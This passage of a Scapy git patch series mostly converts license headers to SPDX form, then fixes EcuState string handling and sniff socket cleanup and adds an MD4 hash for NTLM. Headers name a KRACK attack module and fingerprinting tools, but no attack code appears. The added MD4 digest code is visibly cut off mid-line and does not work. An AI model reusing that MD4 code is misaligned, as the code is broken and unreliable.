OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. -# This file is published as part of Scapy under GPLv2 or later +# This file is published as part of Scapy """Utilities for writing code that runs on Python 2 and 3""" diff --git a/scapy/libs/structures.py b/scapy/libs/structures.py index 2abbca4cc50..c4bc6655499 100644 --- a/scapy/libs/structures.py +++ b/scapy/libs/structures.py @@ -1,6 +1,6 @@ -# This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# This program is published under a GPLv2 license +# SPDX-License-Identifier: GPL-2.0-only +# # This file is part of Scapy +# See https://scapy.net/ for more information """ Commonly used structures shared across Scapy diff --git a/scapy/libs/test_pyx.py b/scapy/libs/test_pyx.py index fa2e3cee50a..77afe77720d 100644 --- a/scapy/libs/test_pyx.py +++ b/scapy/libs/test_pyx.py @@ -1,7 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information """ External link to pyx diff --git a/scapy/libs/winpcapy.py b/scapy/libs/winpcapy.py index 75e92ae0383..74da47a5a3e 100644 --- a/scapy/libs/winpcapy.py +++ b/scapy/libs/winpcapy.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Massimo Ciani (2009) -# Gabriel Potter (2016-2019) -# This program is published under a GPLv2 license +# Copyright (C) Gabriel Potter # Modified for scapy's usage - To support Npcap/Monitor mode diff --git a/scapy/main.py b/scapy/main.py index a3df1238522..98b93d6c6fe 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Main module for interactive startup. diff --git a/scapy/modules/__init__.py b/scapy/modules/__init__.py index a2226fa9189..0c399dc5ef3 100644 --- a/scapy/modules/__init__.py +++ b/scapy/modules/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Package of extension modules that have to be loaded explicitly. diff --git a/scapy/modules/krack/__init__.py b/scapy/modules/krack/__init__.py index 83462abd08f..0c72d40a6fd 100644 --- a/scapy/modules/krack/__init__.py +++ b/scapy/modules/krack/__init__.py @@ -1,3 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + """Module implementing Krack Attack on client, as a custom WPA Access Point Requires the python cryptography package v1.7+. See https://cryptography.io/ diff --git a/scapy/modules/krack/automaton.py b/scapy/modules/krack/automaton.py index 4cbf48f4a7e..bb05728a271 100644 --- a/scapy/modules/krack/automaton.py +++ b/scapy/modules/krack/automaton.py @@ -1,3 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + import hmac import hashlib from itertools import count diff --git a/scapy/modules/krack/crypto.py b/scapy/modules/krack/crypto.py index 2e7b9773538..cfe2e1307e1 100644 --- a/scapy/modules/krack/crypto.py +++ b/scapy/modules/krack/crypto.py @@ -1,3 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + import hashlib import hmac from struct import unpack, pack diff --git a/scapy/modules/nmap.py b/scapy/modules/nmap.py index 27e61609768..957d80d0236 100644 --- a/scapy/modules/nmap.py +++ b/scapy/modules/nmap.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """Clone of Nmap's first generation OS fingerprinting. diff --git a/scapy/modules/p0f.py b/scapy/modules/p0f.py index d8f3edc4ace..b026bd3696d 100644 --- a/scapy/modules/p0f.py +++ b/scapy/modules/p0f.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Clone of p0f v3 passive OS fingerprinting diff --git a/scapy/modules/p0fv2.py b/scapy/modules/p0fv2.py index fe17e16b6ac..5b7b2da848a 100644 --- a/scapy/modules/p0fv2.py +++ b/scapy/modules/p0fv2.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Clone of p0f v2 passive OS fingerprinting diff --git a/scapy/modules/voip.py b/scapy/modules/voip.py index b2c9e2b51ac..edba6bde4a1 100644 --- a/scapy/modules/voip.py +++ b/scapy/modules/voip.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ VoIP (Voice over IP) related functions diff --git a/scapy/packet.py b/scapy/packet.py index a7e42381f54..a8963aaa284 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Packet class diff --git a/scapy/pipetool.py b/scapy/pipetool.py index fe1ffb22140..88d7f726650 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license from __future__ import print_function import os diff --git a/scapy/plist.py b/scapy/plist.py index f8976991e5d..bcd7b6c6f68 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ PacketList: holds several packets and allows to do operations on them. diff --git a/scapy/pton_ntop.py b/scapy/pton_ntop.py index e96b30c4255..0cce2d588b8 100644 --- a/scapy/pton_ntop.py +++ b/scapy/pton_ntop.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Convert IPv6 addresses between textual representation and binary. diff --git a/scapy/route.py b/scapy/route.py index 56724b219bb..5f801e8f466 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Routing and handling of network interfaces. diff --git a/scapy/route6.py b/scapy/route6.py index 77fff4b1062..4671a0ee571 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -1,8 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license - # Copyright (C) 2005 Guillaume Valadon # Arnaud Ebalard diff --git a/scapy/scapypipes.py b/scapy/scapypipes.py index 2d54d7dcd7d..4959837462d 100644 --- a/scapy/scapypipes.py +++ b/scapy/scapypipes.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license from __future__ import print_function import socket diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 2fcb18a6b31..be328baf477 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Functions to send and receive packets. diff --git a/scapy/sessions.py b/scapy/sessions.py index 2e1f19c9ae0..015cb7502d3 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -1,7 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information """ Sessions: decode flow of packets when sniffing diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 0b037c72060..825d1c3f442 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ SuperSocket. diff --git a/scapy/themes.py b/scapy/themes.py index f9abf1091e0..5153bed597c 100644 --- a/scapy/themes.py +++ b/scapy/themes.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Color themes for the interactive console. diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index f02fcbfa403..34c858a8336 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Unit testing infrastructure for Scapy diff --git a/scapy/tools/__init__.py b/scapy/tools/__init__.py index f625678a0f2..a9c3091ec13 100644 --- a/scapy/tools/__init__.py +++ b/scapy/tools/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Additional tools to be run separately diff --git a/scapy/tools/automotive/__init__.py b/scapy/tools/automotive/__init__.py index bcf585e7e16..6911e5c59df 100644 --- a/scapy/tools/automotive/__init__.py +++ b/scapy/tools/automotive/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license """ Automotive related tools to be run separately diff --git a/scapy/tools/automotive/isotpscanner.py b/scapy/tools/automotive/isotpscanner.py index 1cdbf098e68..662c3a270c9 100755 --- a/scapy/tools/automotive/isotpscanner.py +++ b/scapy/tools/automotive/isotpscanner.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss # Copyright (C) Alexander Schroeder -# This program is published under a GPLv2 license from __future__ import print_function diff --git a/scapy/tools/automotive/obdscanner.py b/scapy/tools/automotive/obdscanner.py index b5e95df789b..eb3ced417c0 100755 --- a/scapy/tools/automotive/obdscanner.py +++ b/scapy/tools/automotive/obdscanner.py @@ -1,11 +1,9 @@ -#! /usr/bin/env python - +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Andreas Korb # Copyright (C) Friedrich Feigel # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license from __future__ import print_function diff --git a/scapy/tools/automotive/xcpscanner.py b/scapy/tools/automotive/xcpscanner.py index d79019f28a1..48774032cd8 100755 --- a/scapy/tools/automotive/xcpscanner.py +++ b/scapy/tools/automotive/xcpscanner.py @@ -1,11 +1,9 @@ -#! /usr/bin/env python - +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Fabian Wiche # Copyright (C) Tabea Spahn -# This program is published under a GPLv2 license import argparse import signal import sys diff --git a/scapy/tools/check_asdis.py b/scapy/tools/check_asdis.py index 11873260cf9..ff24cd0e92f 100755 --- a/scapy/tools/check_asdis.py +++ b/scapy/tools/check_asdis.py @@ -1,3 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Philippe Biondi + from __future__ import print_function import getopt diff --git a/scapy/tools/generate_ethertypes.py b/scapy/tools/generate_ethertypes.py index 2a93d734e5a..697e730b06d 100644 --- a/scapy/tools/generate_ethertypes.py +++ b/scapy/tools/generate_ethertypes.py @@ -1,8 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter """Generate the ethertypes file (/etc/ethertypes) based on the OpenBSD source https://github.com/openbsd/src/blob/master/sys/net/ethertypes.h diff --git a/scapy/tools/scapy_pyannotate.py b/scapy/tools/scapy_pyannotate.py index f7d12825a29..2ef16cf76fe 100644 --- a/scapy/tools/scapy_pyannotate.py +++ b/scapy/tools/scapy_pyannotate.py @@ -1,7 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information """ Wrap Scapy's shell in pyannotate. diff --git a/scapy/utils.py b/scapy/utils.py index cf6e8f189c2..45ac6d37dd7 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ General utility functions. diff --git a/scapy/utils6.py b/scapy/utils6.py index 4d7bbfc3dcd..26d4003f995 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -1,8 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license - # Copyright (C) 2005 Guillaume Valadon # Arnaud Ebalard diff --git a/scapy/volatile.py b/scapy/volatile.py index 5cfbfd3e890..bbd331199f6 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -1,9 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi # Copyright (C) Michael Farrell # Copyright (C) Gauthier Sebaux -# This program is published under a GPLv2 license """ Fields that hold random numbers. diff --git a/setup.py b/setup.py index ad2669bc3dc..25a6c9f8559 100755 --- a/setup.py +++ b/setup.py @@ -71,7 +71,7 @@ def process_ignore_tags(buffer): description='Scapy: interactive packet manipulation tool', long_description=get_long_description(), long_description_content_type='text/markdown', - license='GPLv2', + license='GPL-2.0-only', url='https://scapy.net', project_urls={ 'Documentation': 'https://scapy.readthedocs.io', diff --git a/test/benchmark/common.py b/test/benchmark/common.py index d95777f2772..6796fedf05a 100644 --- a/test/benchmark/common.py +++ b/test/benchmark/common.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Guillaume Valadon -# This program is published under a GPLv2 license import os import sys diff --git a/test/benchmark/dissection_and_build.py b/test/benchmark/dissection_and_build.py index ac352a6209b..5178fbd0fff 100644 --- a/test/benchmark/dissection_and_build.py +++ b/test/benchmark/dissection_and_build.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Guillaume Valadon -# This program is published under a GPLv2 license from common import * import time diff --git a/test/benchmark/latency_router.py b/test/benchmark/latency_router.py index c1a51fac4f2..24e2861b881 100644 --- a/test/benchmark/latency_router.py +++ b/test/benchmark/latency_router.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license # https://github.com/secdev/scapy/issues/1791 diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index 661ad8d454f..81368f2655e 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # """ Default imports required for setup of CAN interfaces """ diff --git a/test/testsocket.py b/test/testsocket.py index f10fcf6c11b..e4914208d47 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = TestSocket library for unit tests # scapy.contrib.status = library diff --git a/test/tls/__init__.py b/test/tls/__init__.py index 1b5e2a931c9..61da4a20517 100644 --- a/test/tls/__init__.py +++ b/test/tls/__init__.py @@ -1,6 +1,7 @@ -## This file is part of Scapy -## Copyright (C) 2016 Maxence Tury -## This program is published under a GPLv2 license +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2016 Maxence Tury """ Examples and test PKI for the TLS module. diff --git a/test/tls/example_client.py b/test/tls/example_client.py index fdc93c154ed..374c588138b 100755 --- a/test/tls/example_client.py +++ b/test/tls/example_client.py @@ -1,7 +1,8 @@ #!/usr/bin/env python -## This file is part of Scapy -## This program is published under a GPLv2 license +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information """ Basic TLS client. A ciphersuite may be commanded via a first argument. diff --git a/test/tls/example_server.py b/test/tls/example_server.py index b1ec35dfc0d..f51d3dc7c77 100755 --- a/test/tls/example_server.py +++ b/test/tls/example_server.py @@ -1,7 +1,8 @@ #!/usr/bin/env python -## This file is part of Scapy -## This program is published under a GPLv2 license +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information """ Basic TLS server. A preferred ciphersuite may be provided as first argument. From f38d4c117977309d2d4c4b796823e1483e9a0a7a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 17 Jun 2022 13:01:42 +0200 Subject: [PATCH 0842/1632] Support strings in EcuState values --- scapy/contrib/automotive/ecu.py | 11 +++++------ test/contrib/automotive/ecu.uts | 32 ++++++++++++++++++++++++++++++++ 2 files changed, 37 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 21bc2c57680..b7917a89eb4 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -23,7 +23,7 @@ from scapy.sessions import DefaultSession from scapy.ansmachine import AnsweringMachine from scapy.supersocket import SuperSocket -from scapy.error import Scapy_Exception, warning +from scapy.error import Scapy_Exception __all__ = ["EcuState", "Ecu", "EcuResponse", "EcuSession", @@ -42,12 +42,9 @@ def __init__(self, **kwargs): # type: (Any) -> None self.__cache__ = None # type: Optional[Tuple[List[EcuState], ValuesView[Any]]] # noqa: E501 for k, v in kwargs.items(): - if isinstance(v, (six.string_types, bytes)): - warning("Be careful on usages of 'comparisons' and " - "'if x in y' if you provide a string type as value") if isinstance(v, GeneratorType): v = list(v) - self.__setattr__(k, v) + self.__setitem__(k, v) def _expand(self): # type: () -> List[EcuState] @@ -68,7 +65,9 @@ def _expand(self): @staticmethod def _flatten(x): # type: (Any) -> List[Any] - if hasattr(x, "__iter__") and hasattr(x, "__len__") and len(x) == 1: + if isinstance(x, (six.string_types, bytes)): + return [x] + elif hasattr(x, "__iter__") and hasattr(x, "__len__") and len(x) == 1: return list(*x) elif not hasattr(x, "__iter__"): return [x] diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index 44966588177..af1d70e67db 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -406,6 +406,38 @@ assert s2 in s1 assert s1 not in s2 +s1 = EcuState(ses=1, sa="SEC") +s2 = EcuState(ses=1, sa="SOC") + +assert s1 not in s2 +assert s2 not in s1 +assert s1 != s2 + +s1 = EcuState(ses=1, sa="SEC") +s2 = EcuState(ses=1, sa="SEC") + +assert s1 in s2 +assert s2 in s1 +assert s1 == s2 + + +s1 = EcuState(ses=1, sa="SEC") +s2 = EcuState(ses=1, sa=["SEC", "SOL"]) + + +assert s1 in s2 +assert s2 not in s1 +assert s1 != s2 + + +s1 = EcuState(ses=1, sa=b"SEC") +s2 = EcuState(ses=1, sa=[b"SEC", "SOL"]) + +assert s1 in s2 +assert s2 not in s1 +assert s1 != s2 + + + EcuState modification tests = Basic definitions for tests From f2096586b417f984569f35ebe70c09c9012633c9 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 5 Jul 2022 13:42:38 +0200 Subject: [PATCH 0843/1632] Properly discard close_pipe on socket failure (#3663) --- scapy/automaton.py | 8 ++++---- scapy/sendrecv.py | 6 +++++- scapy/supersocket.py | 4 ++-- test/regression.uts | 22 ++++++++++++++++++++++ test/testsocket.py | 2 +- 5 files changed, 34 insertions(+), 8 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index b72d799d986..7bdf878726c 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -136,7 +136,7 @@ class ObjectPipe(Generic[_T]): def __init__(self, name=None): # type: (Optional[str]) -> None self.name = name or "ObjectPipe" - self._closed = False + self.closed = False self.__rd, self.__wr = os.pipe() self.__queue = deque() # type: Deque[_T] if WINDOWS: @@ -197,7 +197,7 @@ def flush(self): def recv(self, n=0): # type: (Optional[int]) -> Optional[_T] - if self._closed: + if self.closed: return None os.read(self.__rd, 1) elt = self.__queue.popleft() @@ -211,8 +211,8 @@ def read(self, n=0): def close(self): # type: () -> None - if not self._closed: - self._closed = True + if not self.closed: + self.closed = True os.close(self.__rd) os.close(self.__wr) self.__queue.clear() diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index be328baf477..30b705d3b67 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1168,7 +1168,7 @@ def _run(self, # Get select information from the sockets _main_socket = next(iter(sniff_sockets)) select_func = _main_socket.select - nonblocking_socket = _main_socket.nonblocking_socket + nonblocking_socket = getattr(_main_socket, "nonblocking_socket", False) # We check that all sockets use the same select(), or raise a warning if not all(select_func == sock.select for sock in sniff_sockets): warning("Warning: inconsistent socket types ! " @@ -1254,6 +1254,10 @@ def stop_cb(): # Removed dead sockets for s in dead_sockets: del sniff_sockets[s] + if len(sniff_sockets) == 1 and \ + close_pipe in sniff_sockets: # type: ignore + # Only the close_pipe left + del sniff_sockets[close_pipe] # type: ignore except KeyboardInterrupt: pass self.running = False diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 825d1c3f442..3b2bb81335e 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -81,7 +81,7 @@ class tpacket_auxdata(ctypes.Structure): @six.add_metaclass(_SuperSocket_metaclass) class SuperSocket: - closed = 0 # type: int + closed = False # type: bool nonblocking_socket = False # type: bool auxdata_available = False # type: bool @@ -377,7 +377,6 @@ def send(self, x): class SimpleSocket(SuperSocket): desc = "wrapper around a classic socket" - nonblocking_socket = True def __init__(self, sock): # type: (socket.socket) -> None @@ -387,6 +386,7 @@ def __init__(self, sock): class StreamSocket(SimpleSocket): desc = "transforms a stream socket into a layer 2" + nonblocking_socket = True def __init__(self, sock, basecls=None): # type: (socket.socket, Optional[Type[Packet]]) -> None diff --git a/test/regression.uts b/test/regression.uts index 4d3d9ec5242..e141d498399 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1765,6 +1765,28 @@ r = sniff(timeout=3, count=1, assert r += sniff() with socket failure +* GH issue 3631 + +REFPACKET = Ether()/IP()/UDP() + +# A socket that fails after 10 packets +class OOPipe(ObjectPipe): + def recv(self, x=MTU): + self.i = getattr(self, "i", 0) + 1 + if self.i == 11: + self.close() + raise OSError("Giant failure") + pkt = super(OOPipe, self).recv(x) + self.send(REFPACKET) + return pkt + +o = OOPipe() +o.send(REFPACKET) + +pkts = sniff(opened_socket=[o], timeout=3) +assert len(pkts) == 10 + = GH issue 3306 ~ netaccess needs_root diff --git a/test/testsocket.py b/test/testsocket.py index e4914208d47..f8827b8c57a 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -88,7 +88,7 @@ def recv(self, x=MTU): # type: ignore def select(sockets, remain=conf.recv_poll_rate): # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] sock = [s for s in sockets if isinstance(s, ObjectPipe) and - not s._closed] + not s.closed] return cast(List[SuperSocket], select_objects(sock, remain)) def __del__(self): From f800be144166ecac08428db2bedc0c53bb022911 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 5 Jul 2022 14:11:06 +0200 Subject: [PATCH 0844/1632] Add MD4 implementation We need this because md4 is gone starting from OpenSSL 3.. yet used in NTLM --- scapy/layers/tls/crypto/hash.py | 5 +- scapy/layers/tls/crypto/md4.py | 95 +++++++++++++++++++++++++++++++++ tox.ini | 1 + 3 files changed, 99 insertions(+), 2 deletions(-) create mode 100644 scapy/layers/tls/crypto/md4.py diff --git a/scapy/layers/tls/crypto/hash.py b/scapy/layers/tls/crypto/hash.py index 9b25cd65989..c6cb68e2427 100644 --- a/scapy/layers/tls/crypto/hash.py +++ b/scapy/layers/tls/crypto/hash.py @@ -8,8 +8,9 @@ Hash classes. """ -import hashlib from hashlib import md5, sha1, sha224, sha256, sha384, sha512 +from scapy.layers.tls.crypto.md4 import MD4 as md4 + import scapy.libs.six as six @@ -44,7 +45,7 @@ def digest(self, tbd): class Hash_MD4(_GenericHash): - hash_cls = lambda _, x: hashlib.new('md4', x) + hash_cls = md4 hash_len = 16 diff --git a/scapy/layers/tls/crypto/md4.py b/scapy/layers/tls/crypto/md4.py new file mode 100644 index 00000000000..642df9c9305 --- /dev/null +++ b/scapy/layers/tls/crypto/md4.py @@ -0,0 +1,95 @@ +# SPDX-License-Identifier: WTFPL +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2019 James Seo (github.com/kangtastic). + +""" +MD4 implementation + +Modified from: +https://gist.github.com/kangtastic/c3349fc4f9d659ee362b12d7d8c639b6 +""" + +import struct + + +class MD4: + """ + An implementation of the MD4 hash algorithm. + + Modified to provide the same API as hashlib's. + """ + name = 'md4' + block_size = 64 + width = 32 + mask = 0xFFFFFFFF + + # Unlike, say, SHA-1, MD4 uses little-endian. Fascinating! + h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476] + + def __init__(self, msg=b""): + self.msg = msg + + def update(self, msg): + self.msg += msg + + def digest(self): + # Pre-processing: Total length is a multiple of 512 bits. + ml = len(self.msg) * 8 + self.msg += b"\x80" + self.msg += b"\x00" * (-(len(self.msg) + 8) % self.block_size) + self.msg += struct.pack("> (MD4.width - n) + return lbits | rbits diff --git a/tox.ini b/tox.ini index f9d58a08dea..c62fcfd2228 100644 --- a/tox.ini +++ b/tox.ini @@ -155,6 +155,7 @@ per-file-ignores = scapy/contrib/scada/iec104/__init__.py:F405 scapy/layers/tls/all.py:F403 scapy/layers/tls/crypto/all.py:F403 + scapy/layers/tls/crypto/md4.py:E741 scapy/libs/winpcapy.py:F405,F403,E501 scapy/tools/UTscapy.py:E501 exclude = scapy/libs/six.py, From bc8b6bd28477fba7c0123ca54c70d3b767309e3a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 5 Jul 2022 10:15:41 +0200 Subject: [PATCH 0845/1632] Fix for #3667 --- test/contrib/automotive/gm/scanner.uts | 3 +- test/contrib/automotive/obd/scanner.uts | 12 ++++---- .../automotive/scanner/uds_scanner.uts | 3 ++ test/testsocket.py | 28 +++++++------------ 4 files changed, 21 insertions(+), 25 deletions(-) diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 3b3ba7dc3d3..e8237249263 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -55,7 +55,7 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg tester, reset_handler=reset, 